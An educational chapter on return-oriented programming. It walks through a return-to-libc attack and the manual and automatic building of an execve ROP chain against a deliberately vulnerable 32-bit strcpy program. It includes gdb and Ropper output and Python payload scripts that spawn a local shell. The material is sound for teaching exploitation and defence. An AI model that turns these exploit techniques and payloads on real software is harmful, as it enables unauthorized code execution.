Return-oriented Programming (ROP)

The previous chapters discussed two kinds of execution targets: existing functions and custom shellcode. Using existing functions is rather inflexible, and several protection mechanisms prevent the injection of custom executable code, so a more advanced exploitation approach is required. This chapter focuses on exploitation by returning to existing code, which is generally called Return-oriented Programming (ROP). Because ROP uses only existing code, it is not prevented by NX1). A very simple ROP exploit was already used earlier to redirect execution to an existing function without parameters; this chapter explains the concept in more detail.

Return-to-libc

The following vulnerable example code is considered in this section.

rop/libc.c
// gcc -g -O0 -m32 -no-pie -fno-pie -mpreferred-stack-boundary=2 libc.c
#include <stdio.h>
#include <string.h>
 
int main(int argc, char *argv[])
{
    char buffer[8] = {0};
 
    if(argc != 2)
    {
        printf("A single argument is required.\n");
        return 1;
    }
 
    strcpy(buffer, argv[1]);
    return 0;
}

The application to be exploited is very small and contains no function to redirect execution to. However, at runtime the code of all linked shared libraries is available. Because libc is available on almost every system, it is an omnipresent code base for attacks. A ROP exploit using libc is called return-to-libc (or ret2libc for short)2). Since it executes arbitrary shell commands, the system() function is a promising target to redirect execution to. The only requirement when returning into system() is to pass the command to be executed as the first parameter.

ldd is used to find the address at which the library is loaded for the example application.

$ ldd a.out
    linux-gate.so.1 (0xf7fd7000)
    libc.so.6 => /lib32/libc.so.6 (0xf7df9000)
    /lib/ld-linux.so.2 (0xf7fd9000)

Assuming an operating system with ASLR disabled, 0xf7df9000 is the address of the library after being loaded, but the offset of the system() function within the library still needs to be determined. nm is used to find this offset.

$ nm -D /lib32/libc.so.6 | grep system
0003a850 T __libc_system
00113c60 T svcerr_systemerr
0003a850 W system

Adding the library base address 0xf7df9000 and the function offset 0x0003a850 results in an absolute address of 0xf7e33850. The final piece of the exploit is the parameter for system(). Luckily, libc contains a "/bin/sh" string. GDB is used to find the address of this string.
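The address arithmetic can be double-checked with a few lines of Python 3. This is only a sketch: the constants are copied from the ldd and nm output above, and the helper name absolute_address is made up for this illustration.

```python
# Values copied from the ldd and nm output above (ASLR disabled).
LIBC_BASE = 0xf7df9000      # load address of libc reported by ldd
SYSTEM_OFFSET = 0x0003a850  # offset of system() reported by nm


def absolute_address(base, offset):
    """Return the runtime address of a symbol inside a loaded library."""
    return base + offset


system_addr = absolute_address(LIBC_BASE, SYSTEM_OFFSET)
print(hex(system_addr))
```

The same helper works for any other exported symbol, as long as the base address stays fixed between runs.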

Load the application into the debugger and set a breakpoint in the main function. Start the application and wait for the breakpoint to be hit.

$ gdb -q a.out 
Reading symbols from a.out...done.
(gdb) break main
Breakpoint 1 at 0x804843c: file rop_libc.c, line 7.
(gdb) run
Starting program: /home/memory-corruption/a.out 

Breakpoint 1, main (argc=1, argv=0xffffd414) at rop_libc.c:7
7	    char buffer[8] = {0};

To restrict the search for the string to the library, its start and end addresses need to be known. Although the start address was already discovered via ldd, the end address is still unknown. With GDB, the address mapping of shared libraries is easy to access.

(gdb) info proc mappings 
process 2955
Mapped address spaces:

	Start Addr   End Addr       Size     Offset objfile
	 0x8048000  0x8049000     0x1000        0x0 /home/memory-corruption/a.out
	 0x8049000  0x804a000     0x1000        0x0 /home/memory-corruption/a.out
	 0x804a000  0x804b000     0x1000     0x1000 /home/memory-corruption/a.out
	0xf7df7000 0xf7df9000     0x2000        0x0 
	0xf7df9000 0xf7faa000   0x1b1000        0x0 /lib32/libc-2.24.so
	0xf7faa000 0xf7fac000     0x2000   0x1b0000 /lib32/libc-2.24.so
	0xf7fac000 0xf7fad000     0x1000   0x1b2000 /lib32/libc-2.24.so
	0xf7fad000 0xf7fb0000     0x3000        0x0 
	0xf7fd2000 0xf7fd4000     0x2000        0x0 
	0xf7fd4000 0xf7fd7000     0x3000        0x0 [vvar]
	0xf7fd7000 0xf7fd9000     0x2000        0x0 [vdso]
	0xf7fd9000 0xf7ffc000    0x23000        0x0 /lib32/ld-2.24.so
	0xf7ffc000 0xf7ffd000     0x1000    0x22000 /lib32/ld-2.24.so
	0xf7ffd000 0xf7ffe000     0x1000    0x23000 /lib32/ld-2.24.so
	0xfffdd000 0xffffe000    0x21000        0x0 [stack]

It can be concluded that the end address of libc is 0xf7fad000. This address range is now used to search for the "/bin/sh" string.

(gdb) find 0xf7df9000,0xf7fad000,"/bin/sh"
0xf7f55cc8
1 pattern found.

The structure of the payload is as follows. The 8 bytes of the buffer need to be filled up. Next, the 4 bytes of the saved EBP need to be skipped as well. The return address is overwritten with the address of system(). In order to maintain a correct stack frame layout and offset, a dummy return address for system() is required. Finally, the address of "/bin/sh" is added as the parameter to system(). Passing this payload to the program spawns a command shell.

$ ./a.out $(echo -en "AAAAAAAABBBB\x50\x38\xe3\xf7CCCC\xc8\x5c\xf5\xf7")
$
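The payload layout described above can also be assembled programmatically. The following Python 3 sketch assumes the two addresses found earlier (ASLR disabled); the function name ret2libc_payload and its parameters are chosen for this illustration only.

```python
import struct


def ret2libc_payload(system_addr, binsh_addr, buffer_size=8):
    """Build the overflow payload: padding, saved EBP, system(), dummy return, argument."""
    padding = b"A" * buffer_size   # fills the 8-byte buffer
    saved_ebp = b"B" * 4           # overwrites the saved EBP
    dummy_ret = b"C" * 4           # return address seen by system(), never used meaningfully
    return (padding + saved_ebp
            + struct.pack("<I", system_addr)   # overwritten return address
            + dummy_ret
            + struct.pack("<I", binsh_addr))   # first parameter of system()


payload = ret2libc_payload(0xf7e33850, 0xf7f55cc8)
print(payload)
```

struct.pack("<I", ...) takes care of the little-endian byte order, so the addresses can be written in their usual notation.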

ROP Chains

System calls expect their parameters in registers rather than on the stack. Because a buffer overflow cannot overwrite registers directly, the above concept does not apply to them. Furthermore, the x64 architecture passes parameters in registers for regular function calls as well, not only for system calls.

Taking the concept of return-to-libc one step further, several code chunks are used instead of a single function. The exploit payload thus consists of multiple return addresses, each pointing to a small code chunk terminated by a ret instruction. These code chunks are commonly called "gadgets". Chaining them together results in a so-called "ROP chain". Note that the instruction sequence of a gadget does not necessarily need to be valid code with respect to the original application. As shown in the chapter about NOP sleds, decoding opcodes at a different offset changes their meaning and the resulting instructions.
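A rough idea of how gadget candidates arise from arbitrary offsets can be given with a short Python 3 sketch. It only locates ret bytes (opcode 0xc3) in a byte string; real tools additionally disassemble the bytes in front of each hit. The function name find_ret_offsets and the sample bytes are assumptions made for this illustration.

```python
RET_OPCODE = 0xC3  # single-byte near return on x86


def find_ret_offsets(code):
    """Return every offset at which a ret byte occurs, aligned or not."""
    return [i for i, byte in enumerate(code) if byte == RET_OPCODE]


# Intended instructions: xor eax, eax; ret; inc eax; ret; mov ebx, eax; ret
code = bytes.fromhex("31c0" "c3" "40" "c3" "89c3" "c3")
print(find_ret_offsets(code))
```

Offset 6 is the second byte of mov ebx, eax (89 c3). Starting to decode at that offset yields a ret that the original program never contained as a separate instruction.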

The protection mechanism ASLR randomizes the addresses of shared libraries. Thus it is not possible to find a static target address to redirect execution to for return-to-libc attacks. The following examples assume that ASLR is enabled on the executing system.

Toy Example

Before jumping into a real-world example application, a toy example is presented to further illustrate the basic concept. The following gadgets are assumed to be available.

; Gadget 1
xor eax, eax
ret
; Gadget 2
inc eax
ret
; Gadget 3
mov ebx, eax
ret
; Gadget 4
pop ecx
pop edx
ret
; Gadget 5
push eax
ret
; Gadget 6
inc ecx
ret

The goal is to reach the following register state:

  • EAX = 3
  • EBX = 2
  • ECX = 1
  • EDX = 0

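Several gadget sequences reach the target state. One solution is listed below. The trace uses a simplified model: the stack shown is a plain data stack, and every ret simply continues with the next gadget of the sequence.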

Gadget 1
EAX = 0, EBX = undefined, ECX = undefined, EDX = undefined
Stack: Empty

Gadget 5
EAX = 0, EBX = undefined, ECX = undefined, EDX = undefined
Stack: 0

Gadget 5
EAX = 0, EBX = undefined, ECX = undefined, EDX = undefined
Stack: 0, 0

Gadget 4
EAX = 0, EBX = undefined, ECX = 0, EDX = 0
Stack: Empty

Gadget 6
EAX = 0, EBX = undefined, ECX = 1, EDX = 0
Stack: Empty

Gadget 2
EAX = 1, EBX = undefined, ECX = 1, EDX = 0
Stack: Empty

Gadget 2
EAX = 2, EBX = undefined, ECX = 1, EDX = 0
Stack: Empty

Gadget 3
EAX = 2, EBX = 2, ECX = 1, EDX = 0
Stack: Empty

Gadget 2
EAX = 3, EBX = 2, ECX = 1, EDX = 0
Stack: Empty
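The trace above can be replayed with a small Python 3 simulation. It is a sketch of the simplified model used in the trace, not of a real CPU: pushed values live on a separate data stack and ret just moves on to the next gadget, whereas on real x86 the ret after push eax would consume the pushed value as a return address. All names are made up for this illustration.

```python
def run_chain(sequence):
    """Execute toy gadgets by number and return the final registers and data stack."""
    regs = {"eax": None, "ebx": None, "ecx": None, "edx": None}  # None = undefined
    stack = []

    def gadget1():  # xor eax, eax
        regs["eax"] = 0

    def gadget2():  # inc eax
        regs["eax"] += 1

    def gadget3():  # mov ebx, eax
        regs["ebx"] = regs["eax"]

    def gadget4():  # pop ecx; pop edx
        regs["ecx"] = stack.pop()
        regs["edx"] = stack.pop()

    def gadget5():  # push eax (simplified: value stays on the data stack)
        stack.append(regs["eax"])

    def gadget6():  # inc ecx
        regs["ecx"] += 1

    gadgets = {1: gadget1, 2: gadget2, 3: gadget3,
               4: gadget4, 5: gadget5, 6: gadget6}
    for number in sequence:
        gadgets[number]()
    return regs, stack


final_regs, final_stack = run_chain([1, 5, 5, 4, 6, 2, 2, 3, 2])
print(final_regs, final_stack)
```

Other sequences can be tried by changing the list passed to run_chain.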

Building a ROP Chain Manually

Using a slightly modified version of the previous example, this section illustrates the manual generation of a ROP chain. The only difference from the previous example is that all libraries, in particular libc, are linked statically into a single binary.

rop/execve.c
// gcc -g -O0 -m32 -static -no-pie -fno-pie -mpreferred-stack-boundary=2 execve.c
#include <stdio.h>
#include <string.h>
 
int main(int argc, char *argv[])
{
    char buffer[8] = {0};
 
    if(argc != 2)
    {
        printf("A single argument is required.\n");
        return 1;
    }
 
    strcpy(buffer, argv[1]);
    return 0;
}

In the next example the goal is to spawn a shell via an execve system call3). As already described in the chapter about buffer overflow basics, the required state is as follows:

  • EAX contains an identifier for the system call and needs to have the value 11 (0x0b).
  • EBX points to the (\0-terminated) name of the executable to be executed ("/bin/sh" in our case).
  • ECX points to argv, this means it represents an array that contains at least a pointer to the executable name (as referenced by EBX) and is terminated with a NULL-pointer.
  • EDX points to envp. As we do not need environment variables for the execution, we can simply set it to NULL.

The goal is to find a sequence of gadgets that results in this state. Additionally, strcpy() introduces the restriction that the payload must not contain a byte of value 0, because copying stops at the first such byte.
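The zero-byte restriction is easy to test for each 32-bit value that is supposed to become part of the payload. The following Python 3 sketch uses a hypothetical helper named has_null_byte.

```python
import struct


def has_null_byte(value):
    """Return True if the little-endian dword encoding of value contains a 0 byte."""
    return b"\x00" in struct.pack("<I", value)


print(has_null_byte(11))          # the syscall number 11 encodes as 0b 00 00 00
print(has_null_byte(0x080493e3))  # a typical gadget address in this binary
```

This shows why the value 11 cannot simply be placed in the payload and popped into EAX: its upper three bytes are zero, so it has to be computed by gadgets instead.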

It is important to note that processing the binary with objdump yields only a small subset of all possible ROP gadgets, because it disassembles only at the regular instruction offsets. However, there are tools like ROPgadget4) and Ropper5) that can be used to extract all gadgets. These tools can even generate ROP chains automatically, as presented in the next section. For practice, the step of combining gadgets into a chain is done manually here.

For execve we need some values in memory. However, as we are abusing the stack to manage the control flow, another memory region is used to create a custom stack. The memory region used for this stack must be writable, and its address must not contain a byte of value 0. GDB helps to find candidates.

$ gdb -q a.out
Reading symbols from a.out...done.
(gdb) maintenance info sections 
Exec file:
    `/home/memory-corruption/a.out', file type elf32-i386.
 [0]     0x80480f4->0x8048114 at 0x000000f4: .note.ABI-tag ALLOC LOAD READONLY DATA HAS_CONTENTS
 [1]     0x8048114->0x8048138 at 0x00000114: .note.gnu.build-id ALLOC LOAD READONLY DATA HAS_CONTENTS
 [2]     0x8048138->0x80481b0 at 0x00000138: .rel.plt ALLOC LOAD READONLY DATA HAS_CONTENTS
 [3]     0x80481b0->0x80481d3 at 0x000001b0: .init ALLOC LOAD READONLY CODE HAS_CONTENTS
 [4]     0x80481d8->0x8048250 at 0x000001d8: .plt ALLOC LOAD READONLY CODE HAS_CONTENTS
 [5]     0x8048250->0x80bb8d4 at 0x00000250: .text ALLOC LOAD READONLY CODE HAS_CONTENTS
 [6]     0x80bb8e0->0x80bc34d at 0x000738e0: __libc_freeres_fn ALLOC LOAD READONLY CODE HAS_CONTENTS
 [7]     0x80bc350->0x80bc3ee at 0x00074350: __libc_thread_freeres_fn ALLOC LOAD READONLY CODE HAS_CONTENTS
 [8]     0x80bc3f0->0x80bc404 at 0x000743f0: .fini ALLOC LOAD READONLY CODE HAS_CONTENTS
 [9]     0x80bc420->0x80d686c at 0x00074420: .rodata ALLOC LOAD READONLY DATA HAS_CONTENTS
 [10]     0x80d686c->0x80d6894 at 0x0008e86c: __libc_subfreeres ALLOC LOAD READONLY DATA HAS_CONTENTS
 [11]     0x80d68a0->0x80d6bf4 at 0x0008e8a0: __libc_IO_vtables ALLOC LOAD READONLY DATA HAS_CONTENTS
 [12]     0x80d6bf4->0x80d6bf8 at 0x0008ebf4: __libc_atexit ALLOC LOAD READONLY DATA HAS_CONTENTS
 [13]     0x80d6bf8->0x80d6bfc at 0x0008ebf8: __libc_thread_subfreeres ALLOC LOAD READONLY DATA HAS_CONTENTS
 [14]     0x80d6bfc->0x80e9860 at 0x0008ebfc: .eh_frame ALLOC LOAD READONLY DATA HAS_CONTENTS
 [15]     0x80e9860->0x80e991f at 0x000a1860: .gcc_except_table ALLOC LOAD READONLY DATA HAS_CONTENTS
 [16]     0x80eaf60->0x80eaf70 at 0x000a1f60: .tdata ALLOC LOAD DATA HAS_CONTENTS
 [17]     0x80eaf70->0x80eaf88 at 0x000a1f70: .tbss ALLOC
 [18]     0x80eaf70->0x80eaf78 at 0x000a1f70: .init_array ALLOC LOAD DATA HAS_CONTENTS
 [19]     0x80eaf78->0x80eaf80 at 0x000a1f78: .fini_array ALLOC LOAD DATA HAS_CONTENTS
 [20]     0x80eaf80->0x80eaff0 at 0x000a1f80: .data.rel.ro ALLOC LOAD DATA HAS_CONTENTS
 [21]     0x80eb000->0x80eb048 at 0x000a2000: .got.plt ALLOC LOAD DATA HAS_CONTENTS
 [22]     0x80eb060->0x80ebf80 at 0x000a2060: .data ALLOC LOAD DATA HAS_CONTENTS
 [23]     0x80ebf80->0x80ecdac at 0x000a2f80: .bss ALLOC
 [24]     0x80ecdac->0x80ecdc4 at 0x000a2f80: __libc_freeres_ptrs ALLOC
 [25]     0x0000->0x0026 at 0x000a2f80: .comment READONLY HAS_CONTENTS
 [26]     0x0000->0x0020 at 0x000a2fa6: .debug_aranges READONLY HAS_CONTENTS
 [27]     0x0000->0x0364 at 0x000a2fc6: .debug_info READONLY HAS_CONTENTS
 [28]     0x0000->0x0109 at 0x000a332a: .debug_abbrev READONLY HAS_CONTENTS
 [29]     0x0000->0x00c7 at 0x000a3433: .debug_line READONLY HAS_CONTENTS
 [30]     0x0000->0x02ca at 0x000a34fa: .debug_str READONLY HAS_CONTENTS

Memory regions marked as READONLY cannot be used for this task. We choose the following memory region:

 [22]     0x80eb060->0x80ebf80 at 0x000a2060: .data ALLOC LOAD DATA HAS_CONTENTS

Next, the necessary gadgets need to be identified. Ropper will be used interactively to extract and search through all the gadgets.

$ ropper --file a.out --console
[INFO] Load gadgets for section: LOAD
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%

Naturally, there are practically infinitely many ways to reach the desired state.

For example, consider that EAX should be set to 11. Popping this value directly is not an option, because the dword 11 contains zero bytes, so some gadgets need to be combined. First, EAX should be set to 0. A quick search with Ropper reveals a perfect gadget:

(a.out/ELF/x86)> search xor eax, eax
[INFO] Searching for gadgets: xor eax, eax

[INFO] File: a.out
[...]
0x080493e3: xor eax, eax; ret;

To increase the value of EAX, one could search for a simple increment:

(a.out/ELF/x86)> search inc eax
[INFO] Searching for gadgets: inc eax

[INFO] File: a.out
[...]
0x0807b15f: inc eax; ret; 

However, there is also the following gadget, which comes at the cost of an additional pop instruction that needs to be taken care of:

0x0808ecc2: add eax, 0xb; pop edi; ret;

The selection of the gadgets is up to the developer of the chain. In this example, the following gadgets are used.

0x080493e3: xor eax, eax; ret;
0x0808ecc2: add eax, 0xb; pop edi; ret;
0x080b9086: pop eax; ret;
0x0806fb7a: pop edx; ret;
0x0806fba1: pop ecx; pop ebx; ret;
0x0805557b: mov dword ptr [edx], eax; ret;
0x08054d75: mov edx, 0xffffffff; ret;
0x0805dab7: inc edx; ret;
0x0806d755: int 0x80;

We start by setting up the custom stack for execve. The binary does not contain a "/bin/sh" string, so we write it to our custom stack. First, EDX is initialized to point to the custom stack. This is done by returning to the

pop edx
ret

gadget and providing the value to be popped right afterwards. As the custom stack is placed at the start of the .data section, 0x080eb060, the first entries of the ROP chain are as follows.

0x0806fb7a: pop edx; ret;
0x080eb060: address of custom stack

Only the values on the left are part of the chain; the text on the right is only there to increase readability. Next, EAX is set to contain the string "//bi". The leading slash is doubled so that the path fills exactly two dwords.

0x080b9086: pop eax; ret;
0x69622f2f: "//bi" (bytes 2f 2f 62 69 in memory)

Finally, EAX is written to the custom stack.

0x0805557b: mov dword ptr [edx], eax; ret;

Using the same scheme, the string "n/sh" is written to the stack.

0x0806fb7a: pop edx; ret;
0x080eb064: address of custom stack + 4
0x080b9086: pop eax; ret;
0x68732f6e: "n/sh" (bytes 6e 2f 73 68 in memory)
0x0805557b: mov dword ptr [edx], eax; ret;
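How a four-character chunk relates to the dword that ends up in EAX can be checked in Python 3. The helper name chunk_to_dword is hypothetical; it interprets the four bytes in little-endian order, which is how pop eax reads them from the stack.

```python
import struct


def chunk_to_dword(chunk):
    """Interpret four raw bytes as the little-endian dword that pop eax would load."""
    if len(chunk) != 4:
        raise ValueError("a chunk must be exactly four bytes long")
    return struct.unpack("<I", chunk)[0]


for chunk in (b"//bi", b"n/sh"):
    print(chunk, hex(chunk_to_dword(chunk)))
```

The bytes 6e 2f 73 68 ("n/sh") in memory therefore correspond to the register value 0x68732f6e. In a script it is usually simpler to append the raw string than to pack the numeric value.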

Although "//bin/sh" is now placed on the custom stack, it still lacks a terminating \0 byte.

0x0806fb7a: pop edx; ret;
0x080eb068: address of custom stack + 8
0x080493e3: xor eax, eax; ret;
0x0805557b: mov dword ptr [edx], eax; ret;

We also need to set up argv on the custom stack. Remember that argv needs to contain a pointer to "//bin/sh" and a NULL pointer. First, the pointer to the name of the executable is written to the custom stack:

0x0806fb7a: pop edx; ret;
0x080eb06c: address of custom stack + 12
0x080b9086: pop eax; ret;
0x080eb060: address of custom stack ("//bin/sh")
0x0805557b: mov dword ptr [edx], eax; ret;

The terminating NULL-pointer is added directly afterwards.

0x0806fb7a: pop edx; ret;
0x080eb070: address of custom stack + 16
0x080493e3: xor eax, eax; ret;
0x0805557b: mov dword ptr [edx], eax; ret;

With argv being complete, the stack setup is finished.
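The resulting layout of the custom stack can be summarized as a memory image. The Python 3 sketch below assumes the base address 0x080eb060 (the start of .data, as used in the script further down); the function name custom_stack_image is made up for this illustration.

```python
import struct


def custom_stack_image(base):
    """Return the 20 bytes that the write gadgets leave at the custom stack."""
    image = b"//bi"                    # base + 0:  first half of the path
    image += b"n/sh"                   # base + 4:  second half of the path
    image += struct.pack("<I", 0)      # base + 8:  terminating \0 of the string
    image += struct.pack("<I", base)   # base + 12: argv[0], pointer to the path
    image += struct.pack("<I", 0)      # base + 16: argv[1], the NULL pointer
    return image


image = custom_stack_image(0x080eb060)
print(image.hex())
```

EBX later points to base + 0 and ECX to base + 12, so both the path and argv are read from this region.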

EAX is 0, but needs to be 11. Fortunately, there is a gadget that simply adds 11. A dummy value needs to be added for the pop edi instruction. This can be any value not containing a byte of value 0.

0x0808ecc2: add eax, 0xb; pop edi; ret;
0x080eb060: dummy value

EBX and ECX need to point to the correct values on the custom stack.

0x0806fba1: pop ecx; pop ebx; ret;
0x080eb06c: argv (["//bin/sh", NULL])
0x080eb060: address of custom stack ("//bin/sh")

To set envp to NULL, EDX is loaded with 0xffffffff and then incremented, which wraps around to 0 without placing a zero byte in the payload.

0x08054d75: mov edx, 0xffffffff; ret;
0x0805dab7: inc edx; ret;
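The wrap-around can be reproduced in Python 3 by masking the result to 32 bits, since Python integers do not overflow on their own. The helper name inc32 is hypothetical.

```python
MASK32 = 0xffffffff


def inc32(value):
    """Increment a value the way a 32-bit register does, wrapping at 2**32."""
    return (value + 1) & MASK32


edx = 0xffffffff   # state after "mov edx, 0xffffffff"
edx = inc32(edx)   # state after "inc edx"
print(edx)
```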

As a very last step, the interrupt for the system call needs to be executed.

0x0806d755: int 0x80;

To get the final chain, concatenate all values together in the described order. Do not forget that values need to be passed in little-endian format to the application. A Python script helps to generate the payload.

rop/manual_chain.py
#!/usr/bin/env python2
from struct import pack
 
chain = 'AAAABBBBCCCC'
chain += pack('<I', 0x0806fb7a)
chain += pack('<I', 0x080eb060)
chain += pack('<I', 0x080b9086)
chain += '//bi'
chain += pack('<I', 0x0805557b)
chain += pack('<I', 0x0806fb7a)
chain += pack('<I', 0x080eb064)
chain += pack('<I', 0x080b9086)
chain += 'n/sh'
chain += pack('<I', 0x0805557b)
chain += pack('<I', 0x0806fb7a)
chain += pack('<I', 0x080eb068)
chain += pack('<I', 0x080493e3)
chain += pack('<I', 0x0805557b)
chain += pack('<I', 0x0806fb7a)
chain += pack('<I', 0x080eb06c)
chain += pack('<I', 0x080b9086)
chain += pack('<I', 0x080eb060)
chain += pack('<I', 0x0805557b)
chain += pack('<I', 0x0806fb7a)
chain += pack('<I', 0x080eb070)
chain += pack('<I', 0x080493e3)
chain += pack('<I', 0x0805557b)
chain += pack('<I', 0x0808ecc2)
chain += pack('<I', 0x080eb060)
chain += pack('<I', 0x0806fba1)
chain += pack('<I', 0x080eb06c)
chain += pack('<I', 0x080eb060)
chain += pack('<I', 0x08054d75)
chain += pack('<I', 0x0805dab7)
chain += pack('<I', 0x0806d755)
print chain

Passing the output of the script to the application spawns a shell.

$ ./a.out "`./manual_chain.py`"
$
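As a cross-check, the same chain can be built from symbolic names in Python 3, including a test for zero bytes. This is a sketch, not a replacement for the script above: the constant names and the function build_chain are chosen for this illustration, while the values are copied from manual_chain.py.

```python
import struct

DATA = 0x080eb060                  # start of .data, used as custom stack
POP_EDX = 0x0806fb7a               # pop edx; ret
POP_EAX = 0x080b9086               # pop eax; ret
MOV_PTR_EDX_EAX = 0x0805557b       # mov dword ptr [edx], eax; ret
XOR_EAX = 0x080493e3               # xor eax, eax; ret
ADD_EAX_11_POP_EDI = 0x0808ecc2    # add eax, 0xb; pop edi; ret
POP_ECX_POP_EBX = 0x0806fba1       # pop ecx; pop ebx; ret
MOV_EDX_FFFFFFFF = 0x08054d75      # mov edx, 0xffffffff; ret
INC_EDX = 0x0805dab7               # inc edx; ret
INT_80 = 0x0806d755                # int 0x80

ENTRIES = [
    POP_EDX, DATA, POP_EAX, b"//bi", MOV_PTR_EDX_EAX,       # write "//bi"
    POP_EDX, DATA + 4, POP_EAX, b"n/sh", MOV_PTR_EDX_EAX,   # write "n/sh"
    POP_EDX, DATA + 8, XOR_EAX, MOV_PTR_EDX_EAX,            # string terminator
    POP_EDX, DATA + 12, POP_EAX, DATA, MOV_PTR_EDX_EAX,     # argv[0]
    POP_EDX, DATA + 16, XOR_EAX, MOV_PTR_EDX_EAX,           # argv[1] = NULL
    ADD_EAX_11_POP_EDI, DATA,                               # EAX = 11, dummy for edi
    POP_ECX_POP_EBX, DATA + 12, DATA,                       # ECX = argv, EBX = path
    MOV_EDX_FFFFFFFF, INC_EDX,                              # EDX = 0
    INT_80,
]


def build_chain(entries, padding=b"AAAABBBBCCCC"):
    """Concatenate padding and entries; raw bytes are kept, integers are packed."""
    chain = padding
    for entry in entries:
        chain += entry if isinstance(entry, bytes) else struct.pack("<I", entry)
    if b"\x00" in chain:
        raise ValueError("chain contains a zero byte; strcpy() would stop copying there")
    return chain


chain = build_chain(ENTRIES)
print(len(chain))
```

To use the result as a program argument, the raw bytes would have to be written to standard output, for example with sys.stdout.buffer.write(chain), instead of printing the length.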

Generating a ROP Chain Automatically

In the previous section the manual creation of a ROP chain was described. While it is important to understand the concept of building a ROP chain, the actual generation can often be automated.

A ROP chain for the sample application can be generated automatically with ROPgadget:

$ ROPgadget --binary a.out --ropchain

The result of this execution is a Python script constructing the chain. After fixing the padding and adding the print statement in the last line, the resulting script is as follows.

rop/generated_chain.py
#!/usr/bin/env python2
# execve generated by ROPgadget
 
from struct import pack
 
# Padding goes here
p = 'AAAABBBBCCCC'
 
p += pack('<I', 0x0806fb7a) # pop edx ; ret
p += pack('<I', 0x080eb060) # @ .data
p += pack('<I', 0x080b9086) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x0805557b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806fb7a) # pop edx ; ret
p += pack('<I', 0x080eb064) # @ .data + 4
p += pack('<I', 0x080b9086) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x0805557b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806fb7a) # pop edx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8
p += pack('<I', 0x080493e3) # xor eax, eax ; ret
p += pack('<I', 0x0805557b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481d1) # pop ebx ; ret
p += pack('<I', 0x080eb060) # @ .data
p += pack('<I', 0x0806fba1) # pop ecx ; pop ebx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8
p += pack('<I', 0x080eb060) # padding without overwrite ebx
p += pack('<I', 0x0806fb7a) # pop edx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8
p += pack('<I', 0x080493e3) # xor eax, eax ; ret
p += pack('<I', 0x0807b15f) # inc eax ; ret
p += pack('<I', 0x0807b15f) # inc eax ; ret
p += pack('<I', 0x0807b15f) # inc eax ; ret
p += pack('<I', 0x0807b15f) # inc eax ; ret
p += pack('<I', 0x0807b15f) # inc eax ; ret
p += pack('<I', 0x0807b15f) # inc eax ; ret
p += pack('<I', 0x0807b15f) # inc eax ; ret
p += pack('<I', 0x0807b15f) # inc eax ; ret
p += pack('<I', 0x0807b15f) # inc eax ; ret
p += pack('<I', 0x0807b15f) # inc eax ; ret
p += pack('<I', 0x0807b15f) # inc eax ; ret
p += pack('<I', 0x0806d755) # int 0x80
print p

Passing the generated ROP chain to the application spawns a shell.

$ ./a.out "`./generated_chain.py`"
$

Although the manually created chain was not optimized, it is still shorter than the automatically generated one: 31 versus 34 four-byte entries after the padding. In cases of a limited input length this could be an important aspect to consider.




1) T. Saito, R. Watanabe, S. Kondo, S. Sugawara and M. Yokoyama, "A Survey of Prevention/Mitigation against Memory Corruption Attacks," 2016 19th International Conference on Network-Based Information Systems (NBiS), Ostrava, 2016, pp. 500-505.
2) Jon Erickson (2008). Hacking: The Art of Exploitation (2nd edition)